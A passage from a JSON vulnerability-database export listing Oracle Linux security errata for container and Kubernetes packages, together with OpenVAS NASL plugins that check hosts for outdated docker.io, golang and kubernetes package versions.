of CVE-2019-9512 and CVE-2019-9514\n- Resolves: #1766315, #1766214\npodman\n[1.0.0-4.git921f98f]\n- rebuild because of CVE-2019-9512 and CVE-2019-9514\n- Resolves: #1766293, #1766321\nrunc\n[1.0.0-56.rc5.dev.git2abd837]\n- rebuild because of CVE-2019-9512 and CVE-2019-9514\n- Resolves: #1766327, #1766299\nskopeo\n[1:0.1.32-6.0.1.git1715c90]\n- Add oracle registry into the conf file [Orabug: 29845934]\n- Fix oracle registry login issues [Orabug: 29937192]\n[1:0.1.32-6.git1715c90]\n- rebuild because of CVE-2019-9512 and CVE-2019-9514\n- Resolves: #1772129, #1772134\nslirp4netns\n[0.1-3.dev.gitc4e1bc5]\n- Fix CVE-2019-14378 (#1755595).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "oraclelinux", "title": "container-tools:1.0 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14378", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2020-01-03T00:00:00", "id": "ELSA-2019-4273", "href": "http://linux.oracle.com/errata/ELSA-2019-4273.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-30T06:24:44", "description": "kernel-uek-container\n[4.14.35-1902.303.5.3.el7]\n- rds: Deregister all FRWR mr with free_mr (Hans Westgaard Ry) [Orabug: 31476202]\n- Revert 'rds: Do not cancel RDMAs that have been posted to the HCA' (Gerd Rausch) [Orabug: 31475329]\n- Revert 'rds: Introduce rds_conn_to_path helper' (Gerd Rausch) [Orabug: 31475329]\n- Revert 'rds: Three cancel fixes' (Gerd Rausch) [Orabug: 31475318]\n[4.14.35-1902.303.5.2.el7]\n- rds: Three cancel fixes (Hakon Bugge) [Orabug: 31463014]\n[4.14.35-1902.303.5.1.el7]\n- x86/speculation: Add SRBDS vulnerability and mitigation documentation (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/speculation: Add Special Register Buffer Data Sampling (SRBDS) mitigation (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/cpu: Add 'table' argument to cpu_matches() (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/cpu: Add a steppings field to struct x86_cpu_id (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n[4.14.35-1902.303.5.el7]\n- net/mlx5: Decrease default mr cache size (Artemy Kovalyov) [Orabug: 31446379]\n[4.14.35-1902.303.4.el7]\n- net/rds: suppress memory allocation failure reports (Manjunath Patil) [Orabug: 31422157]\n- rds: Do not cancel RDMAs that have been posted to the HCA (Hakon Bugge) [Orabug: 31422151]\n- rds: Introduce rds_conn_to_path helper (Hakon Bugge) [Orabug: 31422151]\nkata-image\n[1.7.3-1.0.5.1]\n- Address Kata CVE 2023\nkata-runtime\n[1.7.3-1.0.5]\n- Address Kata CVE-2020-2023\n- Address Kata CVE-2020-2024\n- Address Kata CVE-2020-2025\n- Address Kata CVE-2020-2026\nkata\n[1.7.3-1.0.7]\n- Address CVE-2020-2023\n- Address CVE-2020-2024\n- Address CVE-2020-2025\n- Address CVE-2020-2026\nkubernetes\n[1.14.9-1.0.6]\n- CVE-2020-8559: Privilege escalation from compromised node to cluster\n- CVE-2020-8557: Node disk DOS by writing to container /etc/hosts\n[1.14.9-1.0.5]\n- Update dependency on Kata containers to a build that includes fixes for CVE-2020-2023 thru CVE-2020-2026\nkubernetes\n[1.17.9-1.0.1.el7]\n- Added Oracle specific build files for Kubernetes\nistio\n[1.4.10-1.0.1]\n- CVE-2020-15104:\n Incorrect validation of wildcard DNS Subject Alternative Names\n[1.4.10-1.0.0]\n- Added Oracle Specific Build Files for istio/istio\nolcne\n[1.1.2-6]\n- Include kata-runtime in the default template\n[1.1.2-5]\n- CVE-2020-8559: Privilege escalation from compromised node to cluster\n- CVE-2020-8557: Node disk DOS by writing to container /etc/hosts\n[1.1.2-4]\n- Update arguments added for istio module.\n[1.1.2-3]\n- Ensure Istio sidecar injector uses valid executable\n[1.1.2-2]\n- Update Kubernetes to use Kata 1.7.3-1.0.7 to address CVE-2020-2023 thru CVE-2020-2026\n[1.1.2-1]\n- Added istio-1.4.10 charts and updated istio.yaml to use istio-1.4.10", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-22T00:00:00", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel-container kata-image kata-runtime kata kubernetes kubernetes istio olcne security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0543", "CVE-2020-10739", "CVE-2020-11080", "CVE-2020-15104", "CVE-2020-1764", "CVE-2020-2023", "CVE-2020-2024", "CVE-2020-2025", "CVE-2020-2026", "CVE-2020-8557", "CVE-2020-8559"], "modified": "2020-07-22T00:00:00", "id": "ELSA-2020-5765", "href": "http://linux.oracle.com/errata/ELSA-2020-5765.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:24:52", "description": "[1.3.9-2]\n- BUILDINFO: commit=4737bd3784f16c18474a60d8678371108f995d7c\n- Addresses CVE-2020-15257\n[1.3.9-1]\n- Added Oracle specific build files", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.2, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-12-03T00:00:00", "type": "oraclelinux", "title": "containerd security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15257"], "modified": "2020-12-03T00:00:00", "id": "ELSA-2020-5964", "href": "http://linux.oracle.com/errata/ELSA-2020-5964.html", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-07-30T06:24:35", "description": "buildah\n[1.11.6-6.0.1]\n- Fixes troubles with oracle registry login [Orabug: 29937283]\n[1.11.6-6]\n- fix COPY command takes long time with buildah\n- Resolves: #1806119\n[1.11.6-5]\n- fix Podman support for FIPS Mode requires a bind mount inside the container\n- Resolves: #1804188\ncockpit-podman\n[11-1]\n- Fix Alert notification in Image Search Modal\n- Allow more than a single Error Notification for Container action errors\n- Various Alert cleanups\n- Translation updates\n- Related: RHELPLAN-25138\n[10-1]\n- Support for user containers\n- Show list of containers that use given image\n- Show placeholder while loading containers and images\n- Fix setting memory limit - bug 1732713\n- Add container Terminal - bug 1703245\n- Related: RHELPLAN-25138\nconmon\n[2:2.0.6-1]\n- update to 2.0.6\n- Related: RHELPLAN-25138\n[2:2.0.5-1]\n- update to 2.0.5\n- Related: RHELPLAN-25138\n[2:2.0.4-1]\n- update to 2.0.4 bugfix release\n- Related: RHELPLAN-25138\n[2:2.0.3-2.giteb5fa88]\n- BR: systemd-devel\n- Related: RHELPLAN-25138\n[2:2.0.3-1.giteb5fa88]\n- update to 2.0.3\n[2:2.0.2-0.1.dev.git422ce21]\n- build latest upstream master\n[2:2.0.0-2]\n- remove BR: go-md2man since no manpages yet\ncontainer-selinux\n[2:2.124.0-1]\n- update to 2.124.0\n- Related: RHELPLAN-25138\nfuse-overlayfs\n[0.7.2-5]\n- be sure to work properly also with older rhel8 kernels, thanks to Giuseppe Scrivano\n- Resolves: #1803495\n[0.7.2-4]\n- latest iteration of segfault fix patch, thanks to Giuseppe Scrivano\n- Resolves: #1803495\n[0.7.2-3]\n- fix fuse-overlayfs segfault\n- Resolves: #1805016\n[0.7.2-2]\n- fix useradd and groupadd fail under rootless Buildah and podman\n- Resolves: #1803495\npodman\n[1.6.4-4.0.1]\n- delivering fix for [Orabug: 29874238] by Nikita Gerasimov \n[1.6.4-4]\n- fix podman (1.6.4) rhel 8.1 no route to host from inside container\n- Resolves: #1806900\n[1.6.4-3]\n- fix Podman support for FIPS Mode requires a bind mount inside the container\n- Resolves: #1804194\npython-podman-api\n[1.2.0-0.2.gitd0a45fe]\n- revert update to 1.6.0 due to new python3-pbr dependency which\nis not in RHEL\n- Related: RHELPLAN-25138\nrunc\n[1.0.0-64.rc9]\n- use no_openssl in BUILDTAGS (no vendored crypto in runc)\n- Related: RHELPLAN-25138\n[1.0.0-63.rc9]\n- be sure to use golang >= 1.12.12-4\n- Related: RHELPLAN-25138\n[1.0.0-62.rc9]\n- rebuild because of CVE-2019-9512 and CVE-2019-9514\n- Related: RHELPLAN-25138\n[1.0.0-61.rc9]\n- update to runc 1.0.0-rc9 release\n- amend golang deps\n- fixes CVE-2019-16884\n[1.0.0-60.rc8]\n- Resolves: #1721247 - enable fips mode\n[1.0.0-59.rc8]\n- Resolves: #1720654 - rebase to v1.0.0-rc8\n[1.0.0-57.rc5.dev.git2abd837]\n- Resolves: #1693424 - podman rootless: cannot specify gid= mount options\nskopeo\n[0.1.40-8.0.1]\n- Add oracle registry into the conf file [Orabug: 29845934]\n- Fix oracle registry login issues [Orabug: 29937192]\n[1:0.1.40-8]\n- change the search order of registries and remove quay.io (#1784267)\nslirp4netns\n[0.4.2-3.git21fdece]\n- Fix CVE-2020-8608\n- Related: RHELPLAN-25138\ntoolbox\n[0.0.4-1.el8]\n- Update for rhel8.1 container-tools module\nudica\n[0.2.1-2]\n- initial import to container-tools 8.2.0\n- Related: RHELPLAN-25139", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-04-15T00:00:00", "type": "oraclelinux", "title": "container-tools:ol8 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16884", "CVE-2019-9512", "CVE-2019-9514", "CVE-2020-8608"], "modified": "2020-04-15T00:00:00", "id": "ELSA-2020-1379", "href": "http://linux.oracle.com/errata/ELSA-2020-1379.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2019-07-12T14:48:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-07-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for docker.io USN-4048-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-15664", "CVE-2019-5736"], "modified": "2019-07-11T00:00:00", "id": "OPENVAS:1361412562310844086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844086", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844086\");\n script_version(\"2019-07-11T11:32:19+0000\");\n script_cve_id(\"CVE-2018-15664\", \"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-11 11:32:19 +0000 (Thu, 11 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-09 02:00:38 +0000 (Tue, 09 Jul 2019)\");\n script_name(\"Ubuntu Update for docker.io USN-4048-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.10|UBUNTU19\\.04|UBUNTU18\\.04 LTS|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4048-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-July/004998.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'docker.io'\n package(s) announced via the USN-4048-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Aleksa Sarai discovered that Docker was vulnerable to a directory traversal\nattack. An attacker could use this vulnerability to read and write arbitrary\nfiles on the host filesystem as root.\");\n\n script_tag(name:\"affected\", value:\"'docker.io' package(s) on Ubuntu 19.04, Ubuntu 18.10, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"docker.io\", ver:\"18.09.7-0ubuntu1~18.10.3\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.04\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"docker.io\", ver:\"18.09.7-0ubuntu1~19.04.4\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"docker.io\", ver:\"18.09.7-0ubuntu1~18.04.3\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"docker.io\", ver:\"18.09.7-0ubuntu1~16.04.4\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-12T16:55:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-09-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4521-1 (docker.io - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-13139", "CVE-2019-13509", "CVE-2019-14271"], "modified": "2019-09-11T00:00:00", "id": "OPENVAS:1361412562310704521", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704521", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704521\");\n script_version(\"2019-09-11T02:00:11+0000\");\n script_cve_id(\"CVE-2019-13139\", \"CVE-2019-13509\", \"CVE-2019-14271\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-11 02:00:11 +0000 (Wed, 11 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-11 02:00:11 +0000 (Wed, 11 Sep 2019)\");\n script_name(\"Debian Security Advisory DSA 4521-1 (docker.io - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB10\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4521.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4521-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'docker.io'\n package(s) announced via the DSA-4521-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Three security vulnerabilities have been discovered in the Docker\ncontainer runtime: Insecure loading of NSS libraries in docker cp could result in execution of code with root privileges, sensitive data\ncould be logged in debug mode and there was a command injection\nvulnerability in the docker build\ncommand.\");\n\n script_tag(name:\"affected\", value:\"'docker.io' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (buster), these problems have been fixed in\nversion 18.09.1+dfsg1-7.1+deb10u1.\n\nWe recommend that you upgrade your docker.io packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"docker-doc\", ver:\"18.09.1+dfsg1-7.1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"docker.io\", ver:\"18.09.1+dfsg1-7.1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"golang-docker-dev\", ver:\"18.09.1+dfsg1-7.1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"golang-github-docker-docker-dev\", ver:\"18.09.1+dfsg1-7.1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"vim-syntax-docker\", ver:\"18.09.1+dfsg1-7.1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:38:31", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for golang (EulerOS-SA-2019-1967)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191967", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191967", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1967\");\n script_version(\"2020-01-23T12:28:43+0000\");\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:28:43 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:28:43 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for golang (EulerOS-SA-2019-1967)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1967\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1967\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'golang' package(s) announced via the EulerOS-SA-2019-1967 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.(CVE-2019-9512)\n\nSome HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both.(CVE-2019-9514)\");\n\n script_tag(name:\"affected\", value:\"'golang' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"golang\", rpm:\"golang~1.12~5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"golang-bin\", rpm:\"golang-bin~1.12~5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"golang-src\", rpm:\"golang-src~1.12~5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-05-06T00:46:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-04-27T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for kubernetes (openSUSE-SU-2020:0554-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1002105", "CVE-2017-1002101", "CVE-2018-16874", "CVE-2016-5195", "CVE-2019-10214", "CVE-2016-8859", "CVE-2018-16873"], "modified": "2020-04-30T00:00:00", "id": "OPENVAS:1361412562310853127", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310853127", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.853127\");\n script_version(\"2020-04-30T08:51:29+0000\");\n script_cve_id(\"CVE-2016-5195\", \"CVE-2016-8859\", \"CVE-2017-1002101\", \"CVE-2018-1002105\", \"CVE-2018-16873\", \"CVE-2018-16874\", \"CVE-2019-10214\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-30 08:51:29 +0000 (Thu, 30 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-27 03:00:42 +0000 (Mon, 27 Apr 2020)\");\n script_name(\"openSUSE: Security Advisory for kubernetes (openSUSE-SU-2020:0554-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2020:0554-1\");\n script_xref(name:\"URL\", 